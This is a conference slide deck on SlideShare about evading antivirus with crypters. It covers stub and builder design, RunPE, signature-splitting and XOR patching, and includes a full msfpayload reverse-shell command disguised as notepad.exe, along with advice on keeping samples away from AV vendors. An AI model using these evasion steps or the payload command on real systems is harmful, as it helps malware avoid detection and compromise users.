SlideShare une entreprise Scribd logo

AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

INCIDE
INCIDE

AntiVirus Evasion Techniques Use of Crypters Presentation 2k14 at MundoHackerDay Congress Kevin Mitnick was also there ;)

Technologie
1  sur  45
Télécharger pour lire hors ligne
AntiVirus Evasion: Use of Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Electrical Engineer and Master in Information Security Co-founder of INCIDE: Electronic Evidence Experts Forensics / Expert Witness Reports Incident Response IT Security Auditors and Colsultants ! ncd:~ apasamar$ rm apasamar.cv
what is this about... • Introduction • AV’s how they work • Malware types and AV detection • Evasion techniques • Auto-encryption, Polymorfism, Ofuscation, Compresion • Crypters • types • stub • stub FUD • Modding techniques • Resources
introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
introduction • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • AV Companies —> MALWARE Detection • BAD GUYS: Undetect MALWARE
introduction Bad guys objective:
introduction Bad guys objective:
AV howto • AntiVirus scan binaries on HARD DISC • They do not SCAN MEMORY, only binaries that ‘start’ the running processes • Scan for signatures: binary sequences @ AV DataBase • Look for malicious tecniques (Heuristics):API’s, functions, XOR, etc • Sandbox (partial execution):look for decryption routines, etc
AV howto EJECUTABLE DISCO RAM PROCESO ? SCAN ? AV
AV howto • AV analysis process: Atacs
AV howto • Recomended: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
AV howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
types of malware and AV detection • Comercial SPY Programms: (white list, signed) • e-blaster • 007 • perfect keylogger • …
• Malware newly created: • LOW detection (NO known signatures) • possible heuristic detections types of malware and AV detection
• Existing Malware: (very well known, signature and heuristic detections) • trojans (BiFrost, PoisonIvy,CyberGate, SpyNet, Darkcomet) • downloaders • passwords stealers • reverse shells types of malware and AV detection
How can we make undetectable malware already detected by AV? • C r y p t e r s: • Software allows you to encrypt ANY MALWARE doing it undetectable to AV.
crypters
builder / stub • Builder: • Is responsible for creating the NEW EXEcutable, composed of the STUB and the ENCRYPTED MALWARE • Stub: • Its mission is to decrypt and run the ENCRYPTED MALWARE
! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB DETECTED MALWARE ENCRYPTED MALWARE STUB CRYPTER (Builder) XOR, RC4, ... exe dll resource builder / stub
STUB CRYPTED MALWARE STUB CRYPTED MALWAREKEY splitter splitter A resource section can always be used builder / stub
• Crypters types: • ScanTime • RunTime builder / stub
• ScanTime STUB CRYPTED MALWARE DETECTED MALWARE HARD DISC AV stub
• RunTime STUB ENCRYPTED MALWARE HARD DISC RAM DETECTEDMALWARE AV stub
• STUB modules: • Decrypt Routine • RunPe (Dynamic Forking) Routine ! stub
RunPE o Dynamic Forking CreateProcess PROCESs 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESS 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
FUD • Target: FUD Stub (Full UnDetectable) • From Source Code • From Binary Code • ¿How? • MODDING
modding source code • Manually or using obfuscation tools: • Function replacement (SPLIT,..) • Funciones/strings/variables replacement and ofuscation. Use of rot13 or Hex encoding • Encrytion: RC4 and XOR are very well known by AV • Alternatives:TEA, DES, etc • Alternative RunPE Routines • Fake APIs • TLB (Tab Library File) • Trash code
• Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips modding binary file
• We have to Undetect STUB, BUILDER is only a tool used at home, not in the wild • First of all is to FIND AV SIGNATURES: • Simple Signatures • Multiple Signatures • Heuristic Signatures modding binary file
• Recomended: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team modding binary file
• ¿What if we use a simple Encrytion/Decrytion rutine inside the STUB? stub.exe EP Signatures stub.exe OLD EP Signatures NEW EP Encrypted Decrytion Rutine modding binary file
• ORIGINAL STUB MULTIPLE AV SCAN modding binary file Do NOT use VirusTotal for these Scans or your STUB samples will be send to AV Companies :(
• ENCRYPTION ROUTINE • NEW EP • INSERT ROUTINE • .text SECTION • from offset 1050 • to Import Table modding binary file
• ENCRYPTION ROUTINE AT NEW EP • used only to encrypt .text section (used once) Set breakpoint here, after encryption routine modding binary file
• DECRYPTION AND EXECUTION AN NEW EP modding binary file
• MODIFIED STUB MULTIPLE AV SCAN 16 AV’s KO modding binary file
modding binary file • Techniques: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR and variants • Tips
• DSplit: Header EXE body Header EXE body 1000 bytes Header EXE body 2000 bytes Header EXE body 3000 bytes Header EXE body ··· Nx1000 bytes modding binary file
• AvFucker: EXE bodyHeader 0000000000 1000 bytes Header EXE body0000000000 1000 bytes Header Cuerpo EXE0000000000 1000 bytes Header EXE body ··· 0000000000 1000 bytes modding binary file Header EXE body
• RIT Technique • Find out AV Signature • If Signture is located at instructions code —> break flow • jump to another address (hole in section where yo can write your code) • Execute pending instrucionts • Return/jump to the appropriate instrucion modding binary file
• XOR Tecnique • Find out AV Signature • Apply to a byte XOR with any value i.e. 22 • Modify EP or jump to your hole • Apply XOR 22 to the modified byte • Return/jump to the appropriate instrucion modding binary file
Detected bytes (EP): XOR of the detected bytes: New EP ( XORs and jump to original EP): modding binary file
other techniques • Add Fake APIs • Hex strings edit • Move/change function calls • Change funtion call type: by name/by offset • Insert detected dll function into Stub Code !
resources • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
Avda. Diagonal, 640 6ª Planta 08017 Barcelona (Spain) info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 A NY Q U E S T I O N S ?

Recommandé

BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
Mauricio Velazco
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
Festival Software Livre
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the Gateways
Onur Alanbel
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 

Recommandé

BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack SimulationsBlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
BlackHat Arsenal 2021 : PurpleSharp - Active Directory Attack Simulations
Mauricio Velazco
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
RootedCON
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
Festival Software Livre
 
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Derbycon 2019 - I simulate therefore i catch: enhancing detection engineering...
Mauricio Velazco
 
Hacking the Gateways
Hacking the GatewaysHacking the Gateways
Hacking the Gateways
Onur Alanbel
 
NSC #2 - Challenge Solution
NSC #2 - Challenge SolutionNSC #2 - Challenge Solution
NSC #2 - Challenge Solution
NoSuchCon
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
Felipe Prado
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
RootedCON
 
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
RootedCON
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
RootedCON
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
Javier Junquera
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Mauricio Velazco
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
Mauricio Velazco
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
RootedCON
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
RootedCON
 
Defending Your Network
Defending Your NetworkDefending Your Network
Defending Your Network
Adam Getchell
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
B.A.
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
Jen Andre
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl
 
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
RootedCON
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
RootedCON
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
Mauricio Velazco
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Ivan Piskunov
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
RootedCON
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
Bishop Fox
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
CODE BLUE
 
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Neel Pathak
 
Binders and crypters
Binders and cryptersBinders and crypters
Binders and crypters
Tej Singh
 

Contenu connexe

Tendances

Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
RootedCON
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Mauricio Velazco
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
Mauricio Velazco
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
RootedCON
 
Defending Your Network
Defending Your NetworkDefending Your Network
Defending Your Network
Adam Getchell
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
Jen Andre
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl
 
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
RootedCON
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
RootedCON
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
RootedCON
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
Bishop Fox
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
CODE BLUE
 

Tendances (20)

Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary SimulationDefcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
Defcon 29 Adversary Village: PurpleSharp - Automated Adversary Simulation
 
Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#Defcon 27 - Writing custom backdoor payloads with C#
Defcon 27 - Writing custom backdoor payloads with C#
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
 
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ...
 
Defending Your Network
Defending Your NetworkDefending Your Network
Defending Your Network
 
Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...Infosecurity.be 2019: What are relevant open source security tools you should...
Infosecurity.be 2019: What are relevant open source security tools you should...
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
Eloi Sanfélix y Javier Moreno - Hardware hacking on your couch [RootedCON 2012]
 
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
Ricardo J. Rodríguez & Daniel Uroz - When ROP meets Turing: Automatic Generat...
 
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
SANS Threat Hunting Summit 2018 - Hunting Lateral Movement with Windows Event...
 
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
Современные технологии и инструменты анализа вредоносного ПО_PHDays_2017_Pisk...
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
 

En vedette

Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasGet the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Shawn Tuma
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
 

En vedette (20)

Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detectionAnti-virus Mechanisms and Various Ways to Bypass Antivirus detection
Anti-virus Mechanisms and Various Ways to Bypass Antivirus detection
 
Binders and crypters
Binders and cryptersBinders and crypters
Binders and crypters
 
Anti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and CountermeasuresAnti-Virus Evasion Techniques and Countermeasures
Anti-Virus Evasion Techniques and Countermeasures
 
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamarEvasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar
 
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirusNoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
NoCONName 2014 (Ncn2k14) Abraham Pasamar - Desmitificando el AntiVirus
 
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las VegasGet the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
Get the FUD out of Cybersecurity! ISACA CSXNA 2016 in Las Vegas
 
Evadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de cryptersEvadiendo antivirus - uso de crypters
Evadiendo antivirus - uso de crypters
 
mimikatz @ asfws
mimikatz @ asfwsmimikatz @ asfws
mimikatz @ asfws
 
Analysis of mass SQL injection attacks
Analysis of mass SQL injection attacksAnalysis of mass SQL injection attacks
Analysis of mass SQL injection attacks
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Navaja negra 2014_nn4ed_abraham_pasamar-desmitificando_el_anti_virus
Navaja negra 2014_nn4ed_abraham_pasamar-desmitificando_el_anti_virusNavaja negra 2014_nn4ed_abraham_pasamar-desmitificando_el_anti_virus
Navaja negra 2014_nn4ed_abraham_pasamar-desmitificando_el_anti_virus
 
Antivirus - Virus detection and removal methods
Antivirus - Virus detection and removal methodsAntivirus - Virus detection and removal methods
Antivirus - Virus detection and removal methods
 
Presentation Slide: Computer Virus
Presentation Slide: Computer VirusPresentation Slide: Computer Virus
Presentation Slide: Computer Virus
 
Anti Virus Software
Anti Virus SoftwareAnti Virus Software
Anti Virus Software
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
11 virus vs. antivirus
11 virus vs. antivirus11 virus vs. antivirus
11 virus vs. antivirus
 
What is Next-Generation Antivirus?
What is Next-Generation Antivirus?What is Next-Generation Antivirus?
What is Next-Generation Antivirus?
 
virus and antivirus
virus and antivirusvirus and antivirus
virus and antivirus
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 

Similaire à AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay

Using Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systemsUsing Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systems
Serge Stinckwich
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 
Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...Practical reverse engineering and exploit development for AVR-based Embedded ...
Practical reverse engineering and exploit development for AVR-based Embedded ...
Alexander Bolshev
 
One Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform ExploitationOne Shellcode to Rule Them All: Cross-Platform Exploitation
One Shellcode to Rule Them All: Cross-Platform Exploitation
Quinn Wilton
 
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual MachineDino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
Dino2 - the Amazing Evolution of the VA Smalltalk Virtual Machine
ESUG
 
Sista: Improving Cog’s JIT performance
Sista: Improving Cog’s JIT performanceSista: Improving Cog’s JIT performance
Sista: Improving Cog’s JIT performance
ESUG
 
Shameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocolsShameful secrets of proprietary network protocols
Shameful secrets of proprietary network protocols
Slawomir Jasek
 

Similaire à AntiVirus Evasion Techniques Use of Crypters 2k14 at MundoHackerDay (20)

Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
 
Using Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systemsUsing Smalltalk for controlling robotics systems
Using Smalltalk for controlling robotics systems
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
